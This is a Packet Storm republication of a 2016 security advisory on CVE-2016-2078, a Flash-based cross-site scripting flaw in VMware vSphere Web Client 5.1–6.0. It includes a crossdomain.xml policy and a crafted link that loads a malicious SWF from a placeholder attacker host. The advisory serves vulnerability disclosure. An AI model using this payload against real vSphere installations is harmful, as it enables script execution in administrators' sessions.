exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VMWare vSphere Web Client 6.0 Cross Site Scripting

VMWare vSphere Web Client 6.0 Cross Site Scripting
Posted May 25, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

VMWare vSphere web client versions 5.1 through 6.0 suffer from a flash cross site scripting vulnerability.

tags | exploit, web, xss
advisories | CVE-2016-2078
SHA-256 | c8bcafc14366eb011661d7807d12b5eae2d46687efbe3ab82c1bfd0c94794b23

VMWare vSphere Web Client 6.0 Cross Site Scripting

Change Mirror Download
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt

[+] ISR: apparitionsec




Vendor:
===============
www.vmware.com



Product:
====================================
VMWare vSphere Web Client v5.1 - 6.0

A server virtualization platform from VMware. Also referred to as a cloud
operating system or virtualized data center platform, VMware vSphere enables
IT departments to efficiently place application workloads on the most
cost-effective compute resource available

VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1
hypervisor that functions as the virtualization server; the VMware vCenter
Server,
which manages vSphere environments; the VMware vSphere Client, which is
used to install and manage virtual machines through the hypervisor; and
VMware VMFS, the file system component from VMware.


Vulnerability Type:
====================
Flash XSS



CVE Reference:
==============
CVE-2016-2078



Vulnerability Details:
=====================

VMWare vSphere Web Client is vulnerable to Flash based XSS through the
loading of arbitrary .SWF files via 'flashvars' parameter. Flashvars is a
Flash Player feature that allows passing of variables to the '_root' level
of a Flash movie from the hosting webpage. Attackers can exploit this
to call arbitrary Flash actionscript functions on the victims Flash Player
client through attacker supplied SWF files that execute in the same
security context as that of vSphere Web Client.


e.g.


flashvars:
'locale=en_US&localeChain=en_US&resourceModuleURLs=locales/UI-en_US.swf&resourceModuleURLs=http%3A%2F%2Fattacker-site%2FEvil.swf',



References:
============
VMSA-2016-0006

http://www.vmware.com/security/advisories/VMSA-2016-0006.html



Exploit code(s):
===============


1) Attacker server needs Flash policy file "crossdomain.xml" It grants
Flash Player permission to talk to servers other than
the one it's hosted on. This will allow victim server ability to talk to
the evil server.

e.g.

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.vsphere-client.com" />
<allow-access-from domain="*vsphere-client.com" />
</cross-domain-policy>


2) Send infected linx to the victim.

https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf



Disclosure Timeline:
=================================
Vendor Notification: Jan 4, 2016
May 25, 2016 : Public Disclosure



Exploitation Technique:
=======================
Remote



Severity Level:
===============
4.2 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N



Description:
================================================
Request Method(s): [+] GET


Vulnerable Product: [+] VMWare 5.1 - 6.0 vsphere-client


Vulnerable Parameter(s): [+] flashvars / resourceModuleURLs
============================================================

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close